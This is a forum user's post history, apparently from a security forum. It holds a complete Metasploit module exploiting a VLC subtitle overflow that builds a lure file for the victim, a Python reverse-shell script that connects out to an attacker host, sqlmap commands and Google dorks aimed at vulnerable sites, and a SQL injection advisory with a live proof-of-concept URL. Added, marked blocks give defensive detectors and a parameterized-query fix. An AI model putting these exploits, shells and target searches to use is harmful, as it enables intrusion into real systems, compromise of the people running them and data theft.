backdoor

Everything posted by backdoor

  1. Because I had a discussion with someone on the forum who insisted that it can't be done ....

      # back up the old sqlmap, in case we change our minds or something goes wrong (e.g. the svn version doesn't work)
      root@bt# cd /pentest/database/
      root@bt# tar -cvf sqlmap.tar sqlmap
      root@bt# rm -rf sqlmap/
      # download the new version from SVN
      root@bt# svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap
  2. Google dork: allinurl:index.php?option=com_ponygallery

     Manual sqlmap:

      ./sqlmap.py --dbms=mysql -p Itemid -u "http://website.com/index.php?option=com_ponygallery&func=viewcategory&catid=4&Itemid=56"

     sqlmap automation:

      ./sqlmap.py --dbms=mysql -p Itemid -g "allinurl:index.php?option=com_ponygallery"
  3. Interesting find. For those who know what backtrack is all about: how do you connect to a backtrack box over the network when the only service is postgresql bound to 127.0.0.1? As for the off-topic discussion above: what does it matter which OS they put the tools on? They probably chose Ubuntu precisely because the kernel is compiled with full support for pretty much everything networking/video/sound.
  4. The truth is the idea seems really clever to me. This would be cool to put into a Facebook application.
  5. napo - if the SysAdmin is asleep ... who would you want to update the vnc? WINDOWS UPDATE? DOHH !!! PS: and I thought it was a Makefile exploit
  6. Holographic Nice tutorial. When you have time again, maybe you'll show us something else interesting. me.mello Better not to know these users. It would be advisable ...
  7. I love these script-kiddie requests: Can't you make me something too, since I only know how to use the mouse ... I'll give you my allowance. Am I whoring myself out on the internet? F1 F1 F1 !
  8. Would it surprise you to find out how many are still using the client/server from 2-3 years ago ...
  9. Google Dork: inurl:admin/view.cgi intitle:Wireless

     Other models: inurl:admin/view.cgi intitle:Camera
  10. wrathofgod be constructive yourself and share something... we're all fed up with idle talk, 10k, 1k, what does it matter... he who seeks, finds!
  11. Honestly, it seems to me the crappiest C&C ever. A new idea, but a very bad one. E.g. if you want to scan a network you send an SMS. If you want to see the result .... you receive a flood of SMSes.
  12.
      ##
      # This file is part of the Metasploit Framework and may be subject to
      # redistribution and commercial restrictions. Please see the Metasploit
      # web site for more information on licensing and terms of use.
      # http://metasploit.com/
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Exploit::Remote
        Rank = GoodRanking

        include Msf::Exploit::FILEFORMAT

        def initialize(info = {})
          super(update_info(info,
            'Name'           => 'VLC Media Player RealText Subtitle Overflow',
            'Description'    => %q{
                This module exploits a stack buffer overflow vulnerability in VideoLAN
              VLC < 0.9.6. The vulnerability exists in the parsing of RealText subtitle
              files. In order to exploit this, this module will generate two files: The
              .mp4 file is used to trick your victim into running. The .rt file is the
              actual malicious file that triggers the vulnerability, which should be
              placed under the same directory as the .mp4 file.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
              [
                'Tobias Klein', # Vulnerability Discovery
                'SkD',          # Exploit
                'juan vazquez'  # Metasploit Module
              ],
            'Version'        => '$Revision: $',
            'References'     =>
              [
                [ 'OSVDB', '49809' ],
                [ 'CVE', '2008-5036' ],
                [ 'BID', '32125' ],
                [ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-011.txt' ],
                [ 'URL', 'http://www.videolan.org/security/sa0810.html' ]
              ],
            'Payload'        =>
              {
                'Space'          => 1900,
                'DisableNops'    => true,
                'BadChars'       => "\x00\x22\x0a",
                'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
              },
            'Platform'       => 'win',
            'Targets'        =>
              [
                [ 'VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1',
                  {
                    'Ret'             => 0x68f0cfad, # jmp esp # libqt4_plugin.dll
                    'WritableAddress' => 0x695d5890  # libqt4_plugin.dll .data
                  }
                ],
              ],
            'Privileged'     => false,
            'DisclosureDate' => 'Nov 05 2008',
            'DefaultTarget'  => 0))

          register_options(
            [
              OptString.new('FILENAME', [ true, 'The file name.', 'msf.rt']),
            ], self.class)
        end

        def generate_mp4
          mp4 = ''
          # ftyp
          mp4 << "\x00\x00\x00\x14" #Size
          mp4 << "ftyp"             #Type
          mp4 << "isom"             #Major brand
          mp4 << "\x00\x00"         #version
          mp4 << "\x00\x00"
          mp4 << "mp41"             #Compatible brands
          # moov
          mp4 << "\x00\x00\x00\x9f" #Size
          mp4 << "moov"             #Type
          mp4 << "\x00\x00\x00\x6c\x6d\x76\x68\x64\x00\x00\x00\x00\xcb\x75\xf1\xc2\xcb\x75\xf1\xc2"
          mp4 << "\x00\x01\x5f\x90\x00\x00\x00\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
          mp4 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          mp4 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00"
          mp4 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          mp4 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x2b"
          mp4 << "udta"
          mp4 << "\x00\x00\x00\x23"
          mp4 << "\xa9\x65\x6e\x63\x00\x17\x00\x00"
          mp4 << "vlc 0.9.4 stream output"
          # wide
          mp4 << "\x00\x00\x00\x08"
          mp4 << "wide"
          # mdat
          mp4 << "\x00\x00\x00\x08"
          mp4 << "mdat"
          return mp4
        end

        def generate_rt
          my_payload = ""
          my_payload << Rex::Text.rand_text(72, payload_badchars)
          my_payload << [target.ret].pack("V") # EIP => jmp esp
          my_payload << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+8").encode_string # ESP => jmp after "Writable address"
          my_payload << Rex::Text.rand_text(2, payload_badchars)
          my_payload << [target['WritableAddress']].pack("V") # Writable address
          my_payload << payload.encoded

          rt_file = <<-eos
      <window height="250" width="300" duration="15" bgcolor="yellow">
      Mary had a little lamb,
      <br/><time begin="#{my_payload}"/>
      <br/><time begin="6"/>little lamb,
      <br/><time begin="9"/>Mary had a little lamb
      <br/><time begin="12"/>whose fleece was white as snow.
      </window>
          eos
          return rt_file
        end

        def exploit
          mp4 = generate_mp4
          rt = generate_rt

          print_status("Creating '#{datastore['FILENAME']}'. Put this file under the same directory as the mp4 file")
          file_create(rt)

          original_fname = datastore['FILENAME']
          datastore['FILENAME'] = original_fname.scan(/(\w+).\w+/).flatten[0] + ".mp4"
          print_status("Creating '#{datastore['FILENAME']}'. This is the file your victim should open.")
          file_create(mp4)
          datastore['FILENAME'] = original_fname
        end
      end

      Source: here
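      A defender's counterpart to the module above, added here and not part of the original post or of Metasploit: a small Python check that flags RealText subtitle files whose <time begin="..."> attribute is far longer than any legitimate timestamp, which is exactly where this module places its payload. The sample .rt contents and the 32-character limit are constructed assumptions, not values taken from VLC.

```python
import re

# Constructed sample files (not from the original post). A normal RealText
# timestamp is a few characters long ("6", "12", "0:00:09.5").
BENIGN_RT = """<window height="250" width="300" duration="15" bgcolor="yellow">
Mary had a little lamb,
<br/><time begin="6"/>little lamb,
<br/><time begin="0:00:09.5"/>Mary had a little lamb
</window>
"""
# Same file with the first begin= value inflated to payload size.
SUSPICIOUS_RT = BENIGN_RT.replace('begin="6"', 'begin="' + "A" * 2100 + '"')

# Assumed upper bound for a timestamp string; nothing legitimate is longer.
MAX_TIME_ATTR = 32
_TIME_ATTR = re.compile(r'<time\b[^>]*?\bbegin\s*=\s*"([^"]*)"', re.IGNORECASE)
# Seconds ("12", "12.5") or h:m:s / m:s clock values ("0:00:09.5").
_VALID_TIME = re.compile(r'^\d+(\.\d+)?$|^(\d+:)?\d{1,2}:\d{1,2}(\.\d+)?$')


def find_suspicious_time_attrs(rt_text):
    """Return (offset, length, reason) for each begin= value that is over-long
    or is not shaped like a RealText timestamp."""
    hits = []
    for m in _TIME_ATTR.finditer(rt_text):
        value = m.group(1)
        if len(value) > MAX_TIME_ATTR:
            hits.append((m.start(1), len(value), "over-long begin attribute"))
        elif not _VALID_TIME.match(value):
            hits.append((m.start(1), len(value), "begin is not a timestamp"))
    return hits


def is_suspicious(rt_text):
    """True when the file carries at least one malformed or oversized begin= value."""
    return bool(find_suspicious_time_attrs(rt_text))


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_RT), ("suspicious", SUSPICIOUS_RT)):
        print(name, find_suspicious_time_attrs(text))
```

      The check is a triage filter for mail gateways or sandboxes, not a parser: a value that is too long is rejected before anything tries to interpret it, which is also the fix the player needed.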
  13. I think it's fair to post the download link from the official site: Download
  14. This is a small connect-back script written in Python.

      #!/usr/bin/python
      # This was written for educational purpose and pentest only. Use it at your own risk.
      # Author will be not responsible for any damage!
      # !!! Special greetz for my friend sinner_01 !!!
      # Toolname : darkBC.py
      # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
      # Version : 0.1
      # Greetz for rsauron and low1z, great python coders
      # greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne and all members of ex darkc0de.com, ljuska.org & darkartists.info
      #

      import sys, socket, os, subprocess

      host = sys.argv[1]
      port = int(sys.argv[2])

      socket.setdefaulttimeout(60)

      def bc():
          try:
              sok = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
              sok.connect((host,port))
              sok.send(''' b4ltazar@gmail.com Ljuska.org \n\n''')
              os.dup2(sok.fileno(),0)
              os.dup2(sok.fileno(),1)
              os.dup2(sok.fileno(),2)
              os.dup2(sok.fileno(),3)
              shell = subprocess.call(["/bin/sh","-i"])
          except socket.timeout:
              print "[!] Connection timed out"
          except socket.error, e:
              print "[!] Error while connecting", e

      bc()

      Source: here
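      As an added example (not from the original post or the script's author): the connect-back above works by dup2()-ing the socket over file descriptors 0, 1 and 2 and then running /bin/sh, so on Linux such a shell shows up in /proc with all three standard descriptors resolving to the same socket inode. The fd tables below are constructed, and the /proc walker assumes a Linux host and enough privilege to read other users' fd links.

```python
import os
import re

_SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")
# Shell names as they appear in /proc/<pid>/comm (assumed list).
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def std_fds_on_socket(fd_links):
    """fd_links maps fd number -> readlink() target of /proc/<pid>/fd/<fd>.
    True when fds 0, 1 and 2 all point at one socket, which is what
    os.dup2(sock.fileno(), 0/1/2) followed by /bin/sh produces."""
    targets = [fd_links.get(fd) for fd in (0, 1, 2)]
    if any(t is None or not _SOCKET_LINK.match(t) for t in targets):
        return False
    return len(set(targets)) == 1


def read_fd_links(pid):
    """Collect fd -> link target for one process; unreadable entries are skipped."""
    links = {}
    fd_dir = "/proc/%d/fd" % pid
    try:
        for name in os.listdir(fd_dir):
            try:
                links[int(name)] = os.readlink(os.path.join(fd_dir, name))
            except OSError:
                continue
    except OSError:
        pass
    return links


def find_socket_shells(proc="/proc"):
    """Return (pid, comm) for every shell whose standard fds are one socket."""
    found = []
    try:
        entries = os.listdir(proc)
    except OSError:
        return found
    for entry in entries:
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open("%s/%d/comm" % (proc, pid)) as f:
                comm = f.read().strip()
        except OSError:
            continue
        if comm in SHELLS and std_fds_on_socket(read_fd_links(pid)):
            found.append((pid, comm))
    return found


# Constructed fd tables, as readlink on /proc/<pid>/fd/N would return them.
REVERSE_SHELL_FDS = {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]", 3: "socket:[48213]"}
INTERACTIVE_SHELL_FDS = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0", 255: "/dev/pts/0"}
```

      Shells legitimately spawned by inetd-style services match the same pattern, so treat a hit as a lead to correlate with the owning user and the socket's peer address rather than as a verdict.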
  15. In The Name Of Allah
      ==============================================================================
      e-Rapido v3.3.2 SQL Injection
      ==============================================================================
      [»] Title : [ e-Rapido v3.3.2 SQL Injection ]
      [»] Author : [ HackStorm ]
      [»] Email : [ HackStorm@live.com ]
      [»] Date : [ 23/2/2012 ]
      [»] Version : [ e-Rapido v3.3.2 ]
      [»] Home : [ wWw.SA3eKA.COM ]
      [»] Google Dork: [ inurl:"filemanager/browser/custom/index.php?id=" ]
      $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
      -[Exploit]-:
      * TARGET/erapido/js/fckeditor/editor/filemanager/browser/custom/index.php?id=[SQL]

      Source: here
  16. Speed SMTP Scanner is a scanner for SMTP servers which scans an IP range and looks for OPEN RELAY SMTP servers (which allow sending e-mails without authentication). The archive also contains the Serial License. Have fun. PS: Some providers in Romania block port 25 incoming and outgoing. Very good for a 2k, 2k3 server that the admin doesn't log into very often.
  17. Your auto-rooter isn't worth two cents, script kiddie! Nice intention anyway.
  18. Title:
      ======
      Facebook view my calendar - SQL Injection Vulnerability

      Date:
      =====
      2012-02-14

      References:
      ===========
      http://www.Ninja-Sec.com

      Introduction:
      =============
      The application is currently included and viewable by all facebook users. The service is an external 3rd party application sponsored by the Facebook view my calendar Development Team.
      (Copy from the Vendors Homepage: http://apps.facebook.com/viewmycalendar/)

      Facebook is a social networking service and website launched in February 2004, operated and privately owned by Facebook, Inc. As of July 2011, Facebook has more than 750 million active users. Users may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Facebook users must register before using the site. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics.
      (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Facebook)

      Abstract:
      =========
      Ninja-Sec discovered a remote SQL Injection vulnerability on the 3rd party web application - Facebook Life Smile (apps.facebook.com).

      Report-Timeline:
      ================
      2012-02-02: Vendor Notification
      2012-02-02: Developer Notification
      2012-02-04: Public or Non-Public Disclosure

      Status:
      ========
      Published

      Exploitation-Technique:
      =======================
      Remote

      Severity:
      =========
      High

      Details:
      ========
      A remote SQL Injection vulnerability is detected on the Facebook Life Smile (apps.facebook). The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected fb application dbms.

      Vulnerable Module(s):
      [+] Life Smile - Facebook 3rd Party Application

      Vulnerable Param(s)/File(s):
      [+] index.php

      Affected Application:
      [+] apps.facebook.com/viewmycalendar/

      Sql Error
      ---
      Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by mon ASC' at line 3' in /home/ashishl/public_html/calendar/index.php:157 Stack trace: #0 /home/ashishl/public_html/calendar/index.php(157): PDOStatement->execute() #1 {main} thrown in /home/ashishl/public_html/calendar/index.php on line 157
      ----

      Proof of Concept:
      =================
      The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...

      URL: http://apps.facebook.com/
      Path: /viewmycalendar/
      File: index.php

      Example:
      http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]

      PoC:
      http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]

      Real World Demo :
      http://apps.facebook.com/viewmycalendar/index.php?page=1'

      Risk:
      =====
      The security risk of the application sql injection vulnerabilities are estimated as high(+).

      Credits:
      ========
      Ninja-Sec Research Laboratory - Mohamed Saad (Anti-Trust)

      Disclaimer:
      ===========
      The information provided in this advisory is provided as it is without any warranty. Ninja-Sec disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Ninja-Sec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Ninja-Sec.com or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

      Any modified copy or reproduction, including partially usages, of this file requires authorization from Ninja-Sec. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Ninja-Sec or its suppliers.

      Copyright © 2012 | Ninja-Sec
      --
      Website: www.Ninja-Sec.com
      Contact: NinjaSec007@gmail.com

      Source: Facebook View My Calendar SQL Injection (Packet Storm)
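      Added example, not from the advisory or from the application itself: the 1064 error quoted above is what an untrusted page value spliced into the SQL text just before the order by mon ASC clause produces. The sqlite3 schema and queries below are constructed stand-ins that reproduce that pattern and show the fix: bind the value, and allowlist any column name that has to go into ORDER BY, because identifiers cannot be bound.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the calendar app's data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE events (id INTEGER, mon INTEGER, title TEXT)")
    db.executemany("INSERT INTO events VALUES (?, ?, ?)",
                   [(1, 3, "march"), (2, 1, "january"), (3, 2, "february")])
    return db


def list_events_vulnerable(db, page):
    """Query text built by concatenation, the pattern behind the advisory.
    A page value of "1'" leaves an unterminated string literal right before
    'order by mon ASC', which is where MySQL reported the syntax error."""
    sql = "SELECT title FROM events WHERE id >= '%s' order by mon ASC" % page
    return [row[0] for row in db.execute(sql)]


def query_fails(db, page):
    """True when the concatenated query is rejected by the SQL parser."""
    try:
        list_events_vulnerable(db, page)
        return False
    except sqlite3.OperationalError:
        return True


ALLOWED_SORT = {"mon", "id", "title"}


def list_events_hardened(db, page, sort="mon"):
    """Value goes through a bind parameter; the sort column is an identifier,
    which bind parameters cannot carry, so it is checked against an allowlist."""
    if sort not in ALLOWED_SORT:
        raise ValueError("unknown sort column")
    try:
        page = int(page)
    except (TypeError, ValueError):
        raise ValueError("page must be an integer")
    sql = "SELECT title FROM events WHERE id >= ? ORDER BY %s ASC" % sort
    return [row[0] for row in db.execute(sql, (page,))]


if __name__ == "__main__":
    db = make_db()
    print(list_events_vulnerable(db, "1"), query_fails(db, "1'"))
    print(list_events_hardened(db, "1"), list_events_hardened(db, 2, "id"))
```

      The hardened version also stops leaking the query text: with a bad input it fails on validation before the database is reached, so no PDOException with the SQL fragment ever makes it into a page.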
  19. 1. Yes, it's about mysql running on the same host as the server. 2. Distributed database systems aren't left with their ass out on the internet. E.g.: tell me on which host/port I can find google.ro's (search engine) database, whatever type it may be. PS: Corporate systems are usually secured well enough, because those admins follow some ISO standards for which they were certified and hired. MySQLs left bare-assed on the internet you'll find at some ordinary mortal who put up his company's site and uses the same server for development at the same time. @co4ie I didn't read it too carefully, anyway I'm glad it's for that piece of crap Debian. May it come sooner, because I have a friend and maybe we'll get a bit cozy. Let us know as soon as possible! Have a nice day!
  20. Yes Nitro, you're right. It may be a super cool exploit. Now I'm curious too: what OS has PHP 5.4.0RC6?????????????? I'd really like to test it!
  21. He may be blind ... or not ... but your link doesn't work either, ionutz15...
  22. 1. SQLMAP works for: MSSQL, MYSQL, ORACLE. To force the tests to be run for mysql you use ./sqlmap.py --dbms=mysql 2. I don't know how you update it. I use Ubuntu's "UPDATE MANAGER" ... You can do the same thing with ... Just as well, you can download sqlmap from sqlmap: automatic SQL injection and database takeover tool : Complicated? HUH!
  23. What's sizeof(int) on 33 bits? 12 cm?
  24. Dude, you flunked. Ha ha ha...
  25. Yes, but to do it with AutoIT you have to read manuals, "waste your time" writing code. Yes, maybe someone will do it for free.... Don't you notice that 3v1lM1nD hasn't replied since 02-06-2012, 03:41 PM. At least a thank-you for the idea.